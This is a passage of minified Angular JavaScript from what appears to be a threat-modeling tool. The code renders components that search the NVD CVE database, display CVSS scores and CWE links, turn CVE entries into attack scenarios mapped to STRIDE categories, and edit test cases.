"),m(6,"mat-panel-title"),s(7),u(),s(8,"\n        "),m(9,"mat-panel-description"),s(10,"\n        "),u(),s(11,"\n      "),u(),s(12,"\n      "),it(13,"app-cwe-entry",15),s(14,"\n    "),u(),s(15,"\n  "),u()),2&t){const e=B(2);C(2),V("expanded",!0),C(5),ct("\n          CWE-",e.entry.CweID,"\n        "),C(6),V("cweID",e.entry.CweID)}}function U9e(t,a){if(1&t){const e=Ye();m(0,"div",1),s(1,"\n  "),m(2,"mat-form-field",2),s(3,"\n    "),m(4,"mat-label"),s(5,"ID"),u(),s(6,"\n    "),it(7,"input",3),s(8,"\n  "),u(),s(9,"\n  "),m(10,"mat-form-field",2),s(11,"\n    "),m(12,"mat-label"),s(13),oe(14,"translate"),u(),s(15,"\n    "),it(16,"input",3),oe(17,"localDate"),s(18,"\n  "),u(),s(19,"\n  "),m(20,"mat-form-field",2),s(21,"\n    "),m(22,"mat-label"),s(23),oe(24,"translate"),u(),s(25,"\n    "),it(26,"input",3),s(27,"\n  "),u(),s(28,"\n  "),m(29,"button",4),he("click",function(){return be(e),Me(B().OpenCVE())}),oe(30,"translate"),s(31,"\n    "),m(32,"mat-icon"),s(33,"open_in_new"),u(),s(34,"\n  "),u(),s(35,"\n  "),it(36,"br"),s(37,"\n  "),ne(38,B9e,39,18,"ng-container",5),s(39,"\n  "),m(40,"mat-form-field",6),s(41,"\n    "),m(42,"mat-label"),s(43),oe(44,"translate"),u(),s(45,"\n    "),it(46,"textarea",7),s(47,"\n  "),u(),s(48,"\n  "),ne(49,H9e,16,3,"mat-accordion",8),s(50,"\n"),u()}if(2&t){const e=B();C(7),V("value",e.entry.ID),C(6),ke(re(14,10,"shared.cveentry.published")),C(3),V("value",re(17,12,e.entry.Published)),C(7),ke(re(24,14,"properties.Status")),C(3),V("value",e.entry.VulnStatus),C(3),at("matTooltip",re(30,16,"general.openInNew")),C(9),V("ngForOf",e.entry.Scores),C(5),ke(re(44,18,"properties.Description")),C(3),V("value",e.entry.Description),C(3),V("ngIf",e.entry.CweID)}}let I5=(()=>{class t{constructor(){}ngOnInit(){}OpenCVE(){window.open(t.GetURL(this.entry.ID),"_blank")}OpenCVSS(e){window.open(Wm.GetURL(e),"_blank")}GetVector(e){const i=Wm.GetVector(e);return i.substring(i.indexOf("/")+1)}GetSeverity(e){return vn.ToString(Wm.ToThreatSeverity(e))}static GetURL(e){return"https://nvd.nist.gov/vuln/detail/"+e}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["app-cve-entry"]],inputs:{entry:"entry"},decls:1,vars:1,consts:[["style","pointer-events: none;",4,"ngIf"],[2,"pointer-events","none"],["appearance","fill",2,"width","200px","margin-right","5px"],["matInput","","type","text",3,"value"],["mat-icon-button","","matTooltipShowDelay","1000",2,"vertical-align","super","pointer-events","all",3,"matTooltip","click"],[4,"ngFor","ngForOf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5","cdkTextareaAutosize","",3,"value"],["style","pointer-events: all;",4,"ngIf"],["appearance","fill",2,"width","200px"],["matInput","","type","number",3,"ngModel"],["appearance","fill",2,"width","200px","margin-left","5px"],["matInput","",3,"ngModel"],[2,"pointer-events","all"],[2,"margin-bottom","10px",3,"expanded"],[3,"cweID"]],template:function(e,i){1&e&&ne(0,U9e,51,20,"div",0),2&e&&V("ngIf",i.entry)}}),t})();function G9e(t,a){1&t&&it(0,"mat-progress-spinner",20),2&t&&V("diameter",20)}function j9e(t,a){1&t&&(m(0,"th",21),s(1),oe(2,"translate"),u()),2&t&&(C(1),ke(re(2,1,"general.Add")))}function Q9e(t,a){if(1&t){const e=Ye();m(0,"td",22),s(1,"\n      "),m(2,"button",23),he("click",function(n){const c=be(e).$implicit;return B().AddThreat(c),Me(n.stopPropagation())}),oe(3,"translate"),s(4,"\n        "),m(5,"mat-icon"),s(6,"flash_on"),u(),s(7,"\n      "),u(),s(8,"\n    "),u()}2&t&&(C(2),at("matTooltip",re(3,1,"pages.modeling.diagram.addAttackScenario")))}function $9e(t,a){1&t&&(m(0,"th",24),s(1," ID "),u())}function K9e(t,a){if(1&t&&(m(0,"td",22),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.ID," ")}}function X9e(t,a){1&t&&(m(0,"th",24),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"shared.cveentry.published")," "))}function Y9e(t,a){if(1&t&&(m(0,"td",22),s(1),oe(2,"localDate"),u()),2&t){const e=a.$implicit;C(1),ct(" ",re(2,1,e.Published)," ")}}function J9e(t,a){1&t&&(m(0,"th",24),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"properties.Status")," "))}function Z9e(t,a){if(1&t&&(m(0,"td",22),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.VulnStatus," ")}}function ePe(t,a){1&t&&(m(0,"th",24),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"report.CvssScore")," "))}function tPe(t,a){if(1&t&&(m(0,"td",22),s(1),u()),2&t){const e=a.$implicit,i=B();C(1),ct(" ",i.GetScore(e)," ")}}function iPe(t,a){1&t&&(m(0,"th",21),s(1,"\xa0"),u())}function aPe(t,a){1&t&&(m(0,"mat-icon"),s(1,"keyboard_arrow_down"),u())}function nPe(t,a){1&t&&(m(0,"mat-icon"),s(1,"keyboard_arrow_up"),u())}function oPe(t,a){if(1&t){const e=Ye();m(0,"td",22),s(1,"\n      "),m(2,"button",25),he("click",function(n){const c=be(e).$implicit,d=B();return d.expandedElement=d.expandedElement===c?null:c,Me(n.stopPropagation())}),s(3,"\n        "),ne(4,aPe,2,0,"mat-icon",26),s(5,"\n        "),ne(6,nPe,2,0,"mat-icon",26),s(7,"\n      "),u(),s(8,"\n    "),u()}if(2&t){const e=a.$implicit,i=B();C(4),V("ngIf",i.expandedElement!==e),C(2),V("ngIf",i.expandedElement===e)}}function rPe(t,a){1&t&&it(0,"app-cve-entry",29),2&t&&V("entry",B().$implicit)}function sPe(t,a){if(1&t&&(m(0,"td",22),s(1,"\n      "),m(2,"div",27),s(3,"\n        "),ne(4,rPe,1,1,"app-cve-entry",28),s(5,"\n      "),u(),s(6,"\n    "),u()),2&t){const e=a.$implicit,i=B();Rt("colspan",i.columnsToDisplayWithExpand.length),C(2),V("@detailExpand",e==i.expandedElement?"expanded":"collapsed"),C(2),V("ngIf",e==i.expandedElement)}}function cPe(t,a){1&t&&it(0,"tr",30)}function lPe(t,a){if(1&t){const e=Ye();m(0,"tr",31),he("click",function(){const r=be(e).$implicit,c=B();return Me(c.expandedElement=c.expandedElement===r?null:r)}),s(1,"\n  "),u()}if(2&t){const e=a.$implicit;Ct("entry-expanded-row",B().expandedElement===e)}}function dPe(t,a){1&t&&it(0,"tr",32)}function mPe(t,a){1&t&&(m(0,"tr",33),s(1,"\n    "),m(2,"td",34),s(3),oe(4,"translate"),u(),s(5,"\n  "),u()),2&t&&(C(3),ke(re(4,1,"shared.cvesearch.noResults")))}const uPe=function(){return["expandedDetail"]},hPe=function(){return[5,10,50,100]};let HG=(()=>{class t{constructor(e,i,n,r,c,d,T){this.theme=n,this.dataService=r,this.dialog=c,this.locStorage=d,this.http=T,this.SearchString="",this.ExactSearch=!1,this.IsSearching=!1,this.NoSearchResult=!1,this.columnsToDisplay=["add","id","published","vulnStatus","score"],this.columnsToDisplayWithExpand=[...this.columnsToDisplay,"expand"],e&&(this.element=e),i&&(this.viewID=i.Value)}ngOnInit(){const e=this.locStorage.Get(si.CVE_SEARCH_HISTORY);if(null==e)this.searchHistory={},this.locStorage.Set(si.CVE_SEARCH_HISTORY,JSON.stringify(this.searchHistory));else if(this.element&&this.viewID){this.searchHistory=JSON.parse(e);const i=this.searchHistory[this.element.ID+this.viewID];i&&(this.SearchString=i,this.Search())}}Search(){var e;(null===(e=this.SearchString)||void 0===e?void 0:e.length)>0&&!this.IsSearching&&(this.IsSearching=!0,this.dataSource=new Ld([]),this.dataSource.paginator=this.paginator,this.http.get("https://services.nvd.nist.gov/rest/json/cves/2.0?keywordSearch="+this.SearchString).subscribe(i=>{var n;if(this.searchHistory[this.element.ID+this.viewID]=this.SearchString,this.locStorage.Set(si.CVE_SEARCH_HISTORY,JSON.stringify(this.searchHistory)),(null===(n=i.vulnerabilities)||void 0===n?void 0:n.length)>0){const r=[];i.vulnerabilities.forEach(c=>{c.cve&&r.push(class q9e{static FromJSON(a){var e,i;let n={ID:a.id,Published:a.published,VulnStatus:a.vulnStatus,Scores:[],Severities:[],Description:"",SourceIdentifier:a.sourceIdentifier,CweID:null};return a.metrics&&Object.keys(a.metrics).length>0&&Object.keys(a.metrics).forEach(r=>{var c;if((null===(c=a.metrics[r])||void 0===c?void 0:c.length)>0){const d=a.metrics[r][0].cvssData;let T={Version:d.version,Vector:d.vectorString};d.baseScore&&(T.Score=Number(d.baseScore)),("3.0"==d.version||"3.1"==d.version)&&(d.attackVector&&(T.AV=d.attackVector[0]),d.attackComplexity&&(T.AC=d.attackComplexity[0]),d.privilegesRequired&&(T.PR=d.privilegesRequired[0]),d.userInteraction&&(T.UI=d.userInteraction[0]),d.scope&&(T.S=d.scope[0]),d.confidentialityImpact&&(T.C=d.confidentialityImpact[0]),d.integrityImpact&&(T.I=d.integrityImpact[0]),d.availabilityImpact&&(T.A=d.availabilityImpact[0])),d.baseSeverity&&n.Severities.push("LOW"==d.baseSeverity?cn.Low:"MEDIUM"==d.baseSeverity?cn.Medium:"HIGH"==d.baseSeverity?cn.High:cn.Critical),n.Scores.push(T)}}),(null===(e=a.descriptions)||void 0===e?void 0:e.length)>0&&(n.Description=a.descriptions.length>1?a.descriptions.find(r=>"en"==r.lang).value:a.descriptions[0].value),(null===(i=a.weaknesses)||void 0===i?void 0:i.length)>0&&a.weaknesses.forEach(r=>{var c;if(null==n.CweID&&(null===(c=r.description)||void 0===c?void 0:c.length)>0){const d=r.description[0].value;isNaN(Number(d.replace("CWE-","")))||(n.CweID=Number(d.replace("CWE-","")))}}),n}}.FromJSON(c.cve)),Object.keys(c).length>1&&console.log("what?",c)}),r.reverse(),this.dataSource=new Ld(r),this.dataSource.sort=this.sort,this.dataSource.paginator=this.paginator,this.NoSearchResult=0==r.length}else this.NoSearchResult=!0;this.IsSearching=!1}))}AddThreat(e){if(this.element&&this.viewID){let i=this.dataService.Project.CreateAttackScenario(this.viewID,!1);const n=[];if(e.Scores.length>0){const r=this.dataService.Config.GetThreatCategoryGroups().find(c=>"STRIDE"==c.Name);if(r){const c=JSON.parse(JSON.stringify(e.Scores));c.sort((T,k)=>k.Version.localeCompare(T.Version));const d=c[0].Vector;"N"!=d[d.indexOf("/C:")+3]&&n.push(r.ThreatCategories.find(T=>T.ImpactCats.includes(so.Confidentiality)).ID),"N"!=d[d.indexOf("/I:")+3]&&n.push(r.ThreatCategories.find(T=>T.ImpactCats.includes(so.Integrity)).ID),"N"!=d[d.indexOf("/A:")+3]&&n.push(r.ThreatCategories.find(T=>T.ImpactCats.includes(so.Availability)).ID)}}i.SetMapping("",n,this.element,[this.element],null,null,null,null),i.Description=e.Description,i.Name=e.ID,i.CveEntry=e,e.Severities&&(i.Severity=Math.max(...e.Severities)),e.Scores.some(r=>r.Version.startsWith("3."))&&(i.ScoreCVSS=JSON.parse(JSON.stringify(e.Scores.find(r=>r.Version.startsWith("3."))))),i.IsGenerated=!1,this.dialog.OpenAttackScenarioDialog(i,!0).subscribe(r=>{r||this.dataService.Project.DeleteAttackScenario(i)})}}SearchKeyUp(e){"Enter"==e.key&&this.Search()}GetScore(e){var i;return(null===(i=e.Scores)||void 0===i?void 0:i.length)>0?Math.max(...e.Scores.map(n=>n.Score).filter(n=>null!=n)).toString():""}}return t.\u0275fac=function(e){return new(e||t)(Ee(Lp,8),Ee(E2,8),Ee(Oa),Ee(Yi),Ee(Wn),Ee(_r),Ee(rp))},t.\u0275cmp=Wt({type:t,selectors:[["app-cve-search"]],viewQuery:function(e,i){if(1&e&&(Mi(il,5),Mi(x8,5)),2&e){let n;Vt(n=Bt())&&(i.sort=n.first),Vt(n=Bt())&&(i.paginator=n.first)}},decls:79,vars:15,consts:[["appearance","fill"],["matInput","","type","text",3,"ngModel","ngModelChange","keyup"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],["style","display: inline; vertical-align: super; margin-left: 5px;","mode","indeterminate",3,"diameter",4,"ngIf"],["mat-table","","multiTemplateDataRows","","matSort","",3,"dataSource"],["matColumnDef","add","stickyEnd",""],["mat-header-cell","",4,"matHeaderCellDef"],["mat-cell","",4,"matCellDef"],["matColumnDef","id"],["mat-header-cell","","mat-sort-header","",4,"matHeaderCellDef"],["matColumnDef","published"],["matColumnDef","vulnStatus"],["matColumnDef","score"],["matColumnDef","expand"],["matColumnDef","expandedDetail"],["mat-header-row","",4,"matHeaderRowDef"],["mat-row","","class","entry-row",3,"entry-expanded-row","click",4,"matRowDef","matRowDefColumns"],["mat-row","","class","entry-detail-row",4,"matRowDef","matRowDefColumns"],["class","mat-row",4,"matNoDataRow"],["showFirstLastButtons","",3,"pageSizeOptions"],["mode","indeterminate",2,"display","inline","vertical-align","super","margin-left","5px",3,"diameter"],["mat-header-cell",""],["mat-cell",""],["mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-header-cell","","mat-sort-header",""],["mat-icon-button","",3,"click"],[4,"ngIf"],[1,"entry-element-detail"],["style","width: 100%;",3,"entry",4,"ngIf"],[2,"width","100%",3,"entry"],["mat-header-row",""],["mat-row","",1,"entry-row",3,"click"],["mat-row","",1,"entry-detail-row"],[1,"mat-row"],["colspan","5",1,"mat-cell"]],template:function(e,i){1&e&&(m(0,"mat-form-field",0),s(1,"\n  "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n  "),m(6,"input",1),he("ngModelChange",function(r){return i.SearchString=r})("keyup",function(r){return i.SearchKeyUp(r)}),u(),s(7,"\n  "),m(8,"button",2),he("click",function(){return i.Search()}),oe(9,"translate"),s(10,"\n    "),m(11,"mat-icon"),s(12,"search"),u(),s(13,"\n  "),u(),s(14,"\n"),u(),s(15,"\n"),ne(16,G9e,1,1,"mat-progress-spinner",3),s(17,"\n\n"),s(18,"\n"),m(19,"table",4),s(20,"\n  "),bt(21,5),s(22,"\n    "),ne(23,j9e,3,3,"th",6),s(24,"\n    "),ne(25,Q9e,9,3,"td",7),s(26,"\n  "),Mt(),s(27,"\n  "),bt(28,8),s(29,"\n    "),ne(30,$9e,2,0,"th",9),s(31,"\n    "),ne(32,K9e,2,1,"td",7),s(33,"\n  "),Mt(),s(34,"\n  "),bt(35,10),s(36,"\n    "),ne(37,X9e,3,3,"th",9),s(38,"\n    "),ne(39,Y9e,3,3,"td",7),s(40,"\n  "),Mt(),s(41,"\n  "),bt(42,11),s(43,"\n    "),ne(44,J9e,3,3,"th",9),s(45,"\n    "),ne(46,Z9e,2,1,"td",7),s(47,"\n  "),Mt(),s(48,"\n  "),bt(49,12),s(50,"\n    "),ne(51,ePe,3,3,"th",9),s(52,"\n    "),ne(53,tPe,2,1,"td",7),s(54,"\n  "),Mt(),s(55,"\n\n  "),bt(56,13),s(57,"\n    "),ne(58,iPe,2,0,"th",6),s(59,"\n    "),ne(60,oPe,9,2,"td",7),s(61,"\n  "),Mt(),s(62,"\n\n  "),s(63,"\n  "),bt(64,14),s(65,"\n    "),ne(66,sPe,7,3,"td",7),s(67,"\n  "),Mt(),s(68,"\n\n  "),ne(69,cPe,1,0,"tr",15),s(70,"\n  "),ne(71,lPe,2,2,"tr",16),s(72,"\n  "),ne(73,dPe,1,0,"tr",17),s(74,"\n  "),ne(75,mPe,6,3,"tr",18),s(76,"\n"),u(),s(77,"\n"),it(78,"mat-paginator",19)),2&e&&(C(3),ke(re(4,9,"shared.cvesearch.Search")),C(3),V("ngModel",i.SearchString),C(2),at("matTooltip",re(9,11,"shared.cvesearch.Search")),C(8),V("ngIf",i.IsSearching),C(3),V("dataSource",i.dataSource),C(50),V("matHeaderRowDef",i.columnsToDisplayWithExpand),C(2),V("matRowDefColumns",i.columnsToDisplayWithExpand),C(2),V("matRowDefColumns",kr(13,uPe)),C(5),V("pageSizeOptions",kr(14,hPe)))},styles:[".primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.toolBtn[_ngcontent-%COMP%]{width:30px;min-width:30px;padding:0;line-height:25px;margin-left:5px}.toolBtn-Selected[_ngcontent-%COMP%]{background-color:#ffffff26}table[_ngcontent-%COMP%]{width:100%}tr.entry-detail-row[_ngcontent-%COMP%]{height:0}.entry-row[_ngcontent-%COMP%]   td[_ngcontent-%COMP%]{border-bottom-width:0}.entry-element-detail[_ngcontent-%COMP%]{overflow:hidden;display:flex}"],data:{animation:[ar("detailExpand",[sn("collapsed",zi({height:"0px",minHeight:"0"})),sn("expanded",zi({height:"*"})),gn("expanded <=> collapsed",En("225ms cubic-bezier(0.4, 0.0, 0.2, 1)"))])]}}),t})();const pPe=["nameBox"],_Pe=["searchBox"];function gPe(t,a){if(1&t){const e=Ye();m(0,"button",31),he("click",function(){return be(e),Me(B(2).testCase.Name="")}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n    "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function CPe(t,a){1&t&&(m(0,"mat-hint",32),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct("\n      ",re(2,1,"messages.error.numberAlreadyExists"),"\n    "))}function yPe(t,a){if(1&t&&(m(0,"mat-option",33),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetTestCaseStateName(e)))}}function bPe(t,a){if(1&t){const e=Ye();m(0,"div",34),s(1,"\n        "),m(2,"img",35,36),he("click",function(){const r=be(e).$implicit;return Me(B(2).ViewImage(r))}),u(),s(4,"\n        "),m(5,"div",37),s(6,"\n          "),m(7,"button",38),he("click",function(){const r=be(e).$implicit;return Me(B(2).DeleteImage(r))}),s(8,"\n            "),m(9,"mat-icon"),s(10,"remove"),u(),s(11,"\n          "),u(),s(12,"\n        "),u(),s(13,"\n      "),u()}if(2&t){const e=a.$implicit;C(2),V("src",e,nm)}}function MPe(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=B().$implicit;C(1),ct("(",e.Value.length,")")}}const UG=function(t){return{groups:t}};function vPe(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",39),he("click",function(){const r=be(e).$implicit;return Me(B(2).selectedLinks=r)}),s(1,"\n            "),m(2,"mat-icon",40),s(3,"arrow_right"),u(),s(4,"\n            "),m(5,"div",41),s(6),oe(7,"translate"),ne(8,MPe,2,1,"ng-container",0),u(),s(9,"\n            "),m(10,"button",42),oe(11,"translate"),m(12,"mat-icon"),s(13,"add"),u()(),s(14,"\n          "),u()}if(2&t){const e=a.$implicit;B();const i=Ti(105),n=B();Ct("highlight-light",n.selectedLinks===e&&!n.theme.IsDarkMode)("highlight-dark",n.selectedLinks===e&&n.theme.IsDarkMode),C(6),ct("",re(7,9,e.Key)," "),C(2),V("ngIf",e.Value.length>0),C(2),at("matTooltip",re(11,11,"general.Add")),V("matMenuTriggerFor",i)("matMenuTriggerData",fr(13,UG,n.GetMenuGroups(e)))}}const APe=function(t){return{items:t}};function TPe(t,a){if(1&t&&(m(0,"button",46),s(1,"\n              "),m(2,"span"),s(3),u(),s(4,"\n            "),u()),2&t){const e=a.$implicit;B(2),V("matMenuTriggerFor",Ti(111))("matMenuTriggerData",fr(3,APe,e.Value)),C(3),ke(e.Key.Name)}}function EPe(t,a){if(1&t){const e=Ye();s(0,"\n            "),m(1,"input",43,44),he("ngModelChange",function(n){return be(e),Me(B(2).searchString=n)})("click",function(){return be(e),Me(B(2).OnSearchBoxClick())}),oe(3,"translate"),u(),s(4,"\n            "),ne(5,TPe,5,5,"button",45),s(6,"\n          ")}if(2&t){const e=a.groups;B();const i=Ti(117),n=B();C(1),at("placeholder",re(3,5,"general.Search")),V("ngModel",n.searchString)("matMenuTriggerFor",i)("matMenuTriggerData",fr(7,UG,e)),C(4),V("ngForOf",e)}}function DPe(t,a){if(1&t){const e=Ye();m(0,"button",48),he("click",function(){const r=be(e).$implicit;return Me(B(3).AddLink(r))}),s(1,"\n              "),m(2,"span"),s(3),u(),s(4,"\n            "),u()}if(2&t){const e=a.$implicit;C(3),ke(e.Name)}}function xPe(t,a){if(1&t&&(s(0,"\n            "),ne(1,DPe,5,1,"button",47),s(2,"\n          ")),2&t){const e=a.items;C(1),V("ngForOf",e)}}function wPe(t,a){if(1&t){const e=Ye();m(0,"button",50),he("click",function(){const r=be(e).$implicit;return Me(B(3).AddLink(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),C(1),ke(e.Name)}}function IPe(t,a){if(1&t&&(s(0,"\n            "),ne(1,wPe,2,2,"button",49),s(2,"\n          ")),2&t){const e=a.groups,i=B(2);C(1),V("ngForOf",i.GetFilteredList(e))}}function RPe(t,a){if(1&t){const e=Ye();m(0,"li"),s(1,"\n                "),m(2,"button",53),he("click",function(){const r=be(e).$implicit;return Me(B(3).OnItemClick(r))}),s(3),u(),s(4,"\n                "),m(5,"button",17),he("click",function(){const r=be(e).$implicit;return Me(B(3).RemoveLink(r))}),oe(6,"translate"),m(7,"mat-icon"),s(8,"delete"),u()(),s(9,"\n              "),u()}if(2&t){const e=a.$implicit,i=B(3);C(3),za("\n                  ",e.Name," in ",i.GetItemView(e).Name,"\n                "),C(2),at("matTooltip",re(6,3,"general.Delete"))}}function SPe(t,a){if(1&t&&(bt(0),s(1,"\n          "),m(2,"div",51),s(3,"\n            "),m(4,"ul"),s(5,"\n              "),ne(6,RPe,10,5,"li",52),s(7,"\n            "),u(),s(8,"\n          "),u(),s(9,"\n        "),Mt()),2&t){const e=B(2);C(6),V("ngForOf",e.selectedLinks.Value)}}function kPe(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n  "),m(2,"mat-form-field",1),s(3,"\n    "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n    "),m(8,"input",2,3),he("ngModelChange",function(n){return be(e),Me(B().testCase.Name=n)}),u(),s(10,"\n    "),ne(11,gPe,6,3,"button",4),s(12,"\n  "),u(),s(13,"\n  "),m(14,"mat-form-field",5),s(15,"\n    "),m(16,"mat-label"),s(17),oe(18,"translate"),u(),s(19,"\n    "),m(20,"input",6),he("ngModelChange",function(n){return be(e),Me(B().testCase.Number=n)}),u(),s(21,"\n    "),ne(22,CPe,3,3,"mat-hint",7),s(23,"\n  "),u(),s(24,"\n  "),it(25,"br"),s(26,"\n  "),m(27,"mat-form-field",8),s(28,"\n    "),m(29,"mat-label"),s(30),oe(31,"translate"),u(),s(32,"\n    "),m(33,"mat-select",9),he("valueChange",function(n){return be(e),Me(B().testCase.Status=n)}),oe(34,"translate"),s(35,"\n      "),ne(36,yPe,3,4,"mat-option",10),s(37,"\n    "),u(),s(38,"\n  "),u(),s(39,"\n  "),m(40,"button",11),he("click",function(){return be(e),Me(B().AddAttackScenario())}),oe(41,"translate"),m(42,"mat-icon"),s(43,"flash_on"),u()(),s(44,"\n  "),it(45,"br"),s(46,"\n  "),m(47,"mat-form-field",12),s(48,"\n    "),m(49,"mat-label"),s(50),oe(51,"translate"),u(),s(52,"\n    "),m(53,"textarea",13),he("ngModelChange",function(n){return be(e),Me(B().testCase.Description=n)}),u(),s(54,"\n  "),u(),s(55,"\n  "),m(56,"div"),s(57,"\n    "),m(58,"mat-form-field",8),s(59,"\n      "),m(60,"mat-label"),s(61),oe(62,"translate"),u(),s(63,"\n      "),m(64,"input",2),he("ngModelChange",function(n){return be(e),Me(B().testCase.Version=n)}),u(),s(65,"\n    "),u(),s(66,"\n    "),it(67,"br"),s(68),oe(69,"translate"),it(70,"app-notes",14),s(71),oe(72,"translate"),it(73,"app-notes",15),s(74),oe(75,"translate"),it(76,"app-notes",14),s(77),oe(78,"translate"),it(79,"app-notes",16),s(80),oe(81,"translate"),m(82,"button",17),he("click",function(){return be(e),Me(Ti(88).click())}),oe(83,"translate"),m(84,"mat-icon"),s(85,"add_photo_alternate"),u()(),s(86,"\n    "),m(87,"input",18,19),he("change",function(n){return be(e),Me(B().OnFileSelected(n))}),u(),s(89,"\n    "),m(90,"div",20),s(91,"\n      "),ne(92,bPe,14,1,"div",21),s(93,"\n    "),u(),s(94,"\n    "),m(95,"div",22),s(96,"\n      "),m(97,"div",23),s(98,"\n        "),m(99,"mat-list",24),s(100,"\n          "),ne(101,vPe,15,15,"mat-list-item",25),s(102,"\n        "),u(),s(103,"\n        "),m(104,"mat-menu",null,26),s(106,"\n          "),ne(107,EPe,7,9,"ng-template",27),s(108," \n        "),u(),s(109,"\n        "),m(110,"mat-menu",null,28),s(112,"\n          "),ne(113,xPe,3,1,"ng-template",27),s(114," \n        "),u(),s(115,"\n        "),m(116,"mat-menu",null,29),s(118,"\n          "),ne(119,IPe,3,1,"ng-template",27),s(120," \n        "),u(),s(121,"\n      "),u(),s(122,"\n      "),m(123,"div",30),s(124,"\n        "),ne(125,SPe,10,1,"ng-container",0),s(126,"\n      "),u(),s(127,"\n    "),u(),s(128,"\n  "),u(),s(129,"\n"),u()}if(2&t){const e=B();C(5),ke(re(6,48,"general.Name")),C(3),at("matTooltip",e.testCase.Name),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.testCase.Name),C(3),V("ngIf",e.testCase.Name),C(6),ke(re(18,50,"general.Number")),C(3),at("matTooltip",e.testCase.Number),V("ngModel",e.testCase.Number),C(2),V("ngIf",e.testCase.CheckUniqueNumber()),C(8),ke(re(31,52,"properties.Status")),C(3),at("matTooltip",re(34,54,e.GetTestCaseStateName(e.testCase.Status))),V("value",e.testCase.Status),C(3),V("ngForOf",e.GetTestCaseStates()),C(4),at("matTooltip",re(41,56,"pages.modeling.diagram.addAttackScenario")),V("disabled",!e.canAddAttackScenario),C(10),ke(re(51,58,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.testCase.Description),C(8),ke(re(62,60,"pages.modeling.testcase.verison")),C(3),at("matTooltip",e.testCase.Version),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.testCase.Version),C(4),ct("\n    ",re(69,62,"properties.PreConditions"),":\n    "),C(2),V("showTimestamp",!1)("hasCheckbox",!1)("strings",e.testCase.PreConditions),C(1),ct("\n    ",re(72,64,"properties.Steps"),":\n    